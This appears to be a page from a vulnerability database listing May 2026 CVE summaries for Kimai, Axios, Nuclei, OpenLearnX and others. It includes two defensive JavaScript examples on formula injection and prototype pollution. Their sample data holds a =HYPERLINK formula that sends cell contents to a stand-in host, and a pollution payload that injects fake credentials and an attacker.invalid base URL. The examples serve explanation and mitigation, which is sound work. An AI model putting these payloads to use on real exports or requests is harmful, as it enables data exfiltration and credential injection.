4.1

CVSS3.1

CVE-2026-44298 - Kimai: Arbitrary file read in invoice PDF renderer (admin)

Kimai is an open-source time tracking application. From version 2.32.0 to before version 2.56.0, users with the role System-Admin (ROLE_SUPER_ADMIN) and the permission upload_invoice_template can upload PDF invoice templates, which can call pdfContext.setOption('associated_files', ...) inside the s…

📅 Published: May 8, 2026, 3:32 a.m. 🔄 Last Modified: May 8, 2026, 2:06 p.m.

3.3

CVSS3.1

CVE-2026-41498 - Kimai: Team API Missing Object-Level Authorization

Kimai is an open-source time tracking application. Prior to version 2.54.0, the Team API endpoints use #[IsGranted('edit_team')] instead of #[IsGranted('edit', 'team')], causing Symfony TeamVoter to abstain from voting. This removes entity-level ownership checks on team operations, allowing any use…

📅 Published: May 8, 2026, 3:30 a.m. 🔄 Last Modified: May 8, 2026, 5:30 a.m.

6.9

CVSS4.0

CVE-2026-8133 - zyx0814 FilePress Shares Filelist API admin.php sql injection

A security vulnerability has been detected in zyx0814 FilePress up to 2.2.0. Affected by this vulnerability is an unknown functionality of the file dzz/shares/admin.php of the component Shares Filelist API. Such manipulation of the argument order leads to SQL injection. The attack can be launched r…

📅 Published: May 8, 2026, 3:30 a.m. 🔄 Last Modified: May 8, 2026, 2:07 p.m.

5.4

CVSS4.0

CVE-2026-42267 - Kimai: Formula Injection via tag names in XLSX export

Kimai is an open-source time tracking application. From version 2.27.0 to before version 2.54.0, any ROLE_USER can create a tag with a formula string as its name (e.g. =SUM(54+51)) via POST /api/tags and assign it to a timesheet. When an admin exports timesheets to XLSX, ArrayFormatter.formatValue(…

📅 Published: May 8, 2026, 3:28 a.m. 🔄 Last Modified: May 8, 2026, 12:58 p.m.
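The formula-injection entry above turns on one detail: an attacker-supplied string such as =SUM(54+51) reaches a spreadsheet cell and the client evaluates it. The following is an added example, not Kimai code, showing the class of fix: detect formula-like strings (leading =, +, -, @, tab or CR), force them to be read as text, and only then quote them for the export. Helper names and the sample rows are constructed for this example.

```javascript
// Added example (not Kimai code): neutralising spreadsheet formula injection in
// an export. A tag name such as "=SUM(54+51)" must leave the exporter as text,
// never as something a spreadsheet client evaluates as a formula.

// Leading characters that make Excel/LibreOffice treat a cell as a formula
// (including the DDE/hyperlink tricks built on top of formulas).
const FORMULA_PREFIXES = new Set(['=', '+', '-', '@', '\t', '\r']);

// True when a string cell would be interpreted as a formula. Leading
// whitespace is skipped because some clients trim it before parsing.
function isFormulaLike(value) {
  if (typeof value !== 'string') return false;
  const first = value.replace(/^\s+/, '')[0];
  return first !== undefined && FORMULA_PREFIXES.has(first);
}

// Force the cell to be read as text: a leading apostrophe is the conventional
// text marker in Excel and LibreOffice. Numbers pass through untouched, so a
// genuine negative value such as -5 is not turned into a string.
function neutraliseCell(value) {
  return isFormulaLike(value) ? "'" + value : value;
}

// Minimal RFC 4180 quoting: wrap the field when it contains a delimiter,
// a double quote or a line break, and double any embedded quotes.
function csvField(value) {
  const s = String(value);
  return /[",\r\n]/.test(s) ? '"' + s.replace(/"/g, '""') + '"' : s;
}

// Neutralise first, quote second: quoting alone does not stop evaluation.
function buildCsv(rows) {
  return rows
    .map((row) => row.map((v) => csvField(neutraliseCell(v))).join(','))
    .join('\n');
}

// Constructed sample: one row per timesheet entry; the "tags" column is the
// attacker-controlled field from the advisory.
const SAMPLE_ROWS = [
  ['user', 'duration', 'tags'],
  ['alice', 90, 'billable'],
  ['mallory', 15, '=SUM(54+51)'],
  ['mallory', 15, '=HYPERLINK("http://example.invalid/"&A1,"click")'],
  ['eve', -5, '@cmd'],
];

function exportSample() {
  return buildCsv(SAMPLE_ROWS);
}

console.log(exportSample());
```

The same rule applies to a native XLSX writer: the cell must be emitted with an explicit string type rather than handed to a value binder that auto-detects formulas from a leading "=".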

8.8

CVSS3.1

CVE-2026-41900 - OpenLearnX has Critical Remote Code Execution Through Python Sandbox Escape via Code Execution Envi…

OpenLearnX is an open-source, decentralized learning and assessment platform. Prior to version 2.0.3, a remote code execution (RCE) vulnerability was identified in the OpenLearnX code execution environment, allowing sandbox escape and arbitrary command execution. This issue has been patched in vers…

📅 Published: May 8, 2026, 3:25 a.m. 🔄 Last Modified: May 8, 2026, 12:54 p.m.

5.1

CVSS3.1

CVE-2026-42150 - wlc: print_html outputs API data without HTML escaping, enabling stored XSS

wlc is a Weblate command-line client using Weblate's REST API. Prior to version 2.0.0, the HTML output format in wlc embeds API response data into HTML without escaping, allowing cross-site scripting when the output is rendered in a browser. This issue has been patched in version 2.0.0.

📅 Published: May 8, 2026, 3:23 a.m. 🔄 Last Modified: May 8, 2026, 7 a.m.

7.4

CVSS3.1

CVE-2026-42264 - Axios: Prototype pollution read-side gadgets in HTTP adapter allow credential injection and request…

Axios is a promise-based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, five config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making th…

📅 Published: May 8, 2026, 3:20 a.m. 🔄 Last Modified: May 8, 2026, 2:10 p.m.
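The Axios entry describes a read-side gadget: the adapter itself never writes to a prototype, but a plain property read such as config.auth falls through to Object.prototype, so whatever an unrelated pollution bug planted there is honoured as if the caller had set it. The block below is an added example, not Axios code, contrasting that pattern with an own-property guard for two of the listed properties (auth and baseURL). The helper names, the simulated pollution and the request config are constructed for the demonstration.

```javascript
// Added example (not Axios code): a prototype-pollution "read-side gadget" and
// the own-property guard that closes it. Helper names are hypothetical.

function basicAuthHeader(auth) {
  return 'Basic ' + Buffer.from(`${auth.username}:${auth.password}`).toString('base64');
}

// Vulnerable pattern: direct reads fall through to the prototype chain, so a
// polluted Object.prototype.auth injects credentials and a polluted baseURL
// redirects the request to an attacker-chosen host.
function buildRequestUnsafe(config) {
  const headers = {};
  if (config.auth) headers.Authorization = basicAuthHeader(config.auth);
  const base = config.baseURL ? config.baseURL : '';
  return { url: base + config.url, headers };
}

// Hardened pattern: only honour properties the caller set on the object itself.
function own(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key) ? obj[key] : undefined;
}

function buildRequestSafe(config) {
  const headers = {};
  const auth = own(config, 'auth');
  if (auth) headers.Authorization = basicAuthHeader(auth);
  const base = own(config, 'baseURL');
  return { url: (base || '') + own(config, 'url'), headers };
}

// Simulate a pollution primitive (constructed for this demo) and compare both
// builders on a config that sets nothing but a relative url. The prototype is
// restored afterwards so the rest of the process is unaffected.
function demo() {
  const polluted = {
    auth: { username: 'attacker', password: 'x' },
    baseURL: 'http://attacker.invalid',
  };
  for (const [k, v] of Object.entries(polluted)) {
    // Non-enumerable mimics a stealthy pollution: it will not show up in for-in
    // or Object.keys, yet a plain read still inherits it.
    Object.defineProperty(Object.prototype, k, {
      value: v, writable: true, configurable: true, enumerable: false,
    });
  }
  try {
    const config = { url: '/v1/transfer' };
    return { unsafe: buildRequestUnsafe(config), safe: buildRequestSafe(config) };
  } finally {
    for (const k of Object.keys(polluted)) delete Object.prototype[k];
  }
}

console.log(JSON.stringify(demo(), null, 2));
```

A hasOwnProperty guard (or building the config from Object.create(null)) is the read-side mitigation; it does not remove the pollution primitive itself, so the write-side bug still needs to be found and fixed separately.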

5.3

CVSS3.1

CVE-2026-41645 - Nuclei: Environment variable disclosure via Response-Derived DSL Expressions

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's expression evaluation engine makes it possible for a malicious target server to inject and execute supported DSL expressions. This happens when HTTP response d…

📅 Published: May 8, 2026, 3:17 a.m. 🔄 Last Modified: May 8, 2026, 5:30 a.m.

6.9

CVSS4.0

CVE-2026-8132 - CodeAstro Leave Management System login.php sql injection

A weakness has been identified in CodeAstro Leave Management System 1.0. Affected is an unknown function of the file /login.php. This manipulation of the argument txt_username causes SQL injection. The attack can be initiated remotely. The exploit has been made available to the public and could be …

📅 Published: May 8, 2026, 3:15 a.m. 🔄 Last Modified: May 8, 2026, 3:15 a.m.

5.5

CVSS3.1

CVE-2026-41646 - Nuclei: Local File Read via require() Module Loader Bypass

Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require() function, bypassing the default local file acce…

📅 Published: May 8, 2026, 3:14 a.m. 🔄 Last Modified: May 8, 2026, 7:30 a.m.
Total results: 349182
Page 30 of 34,919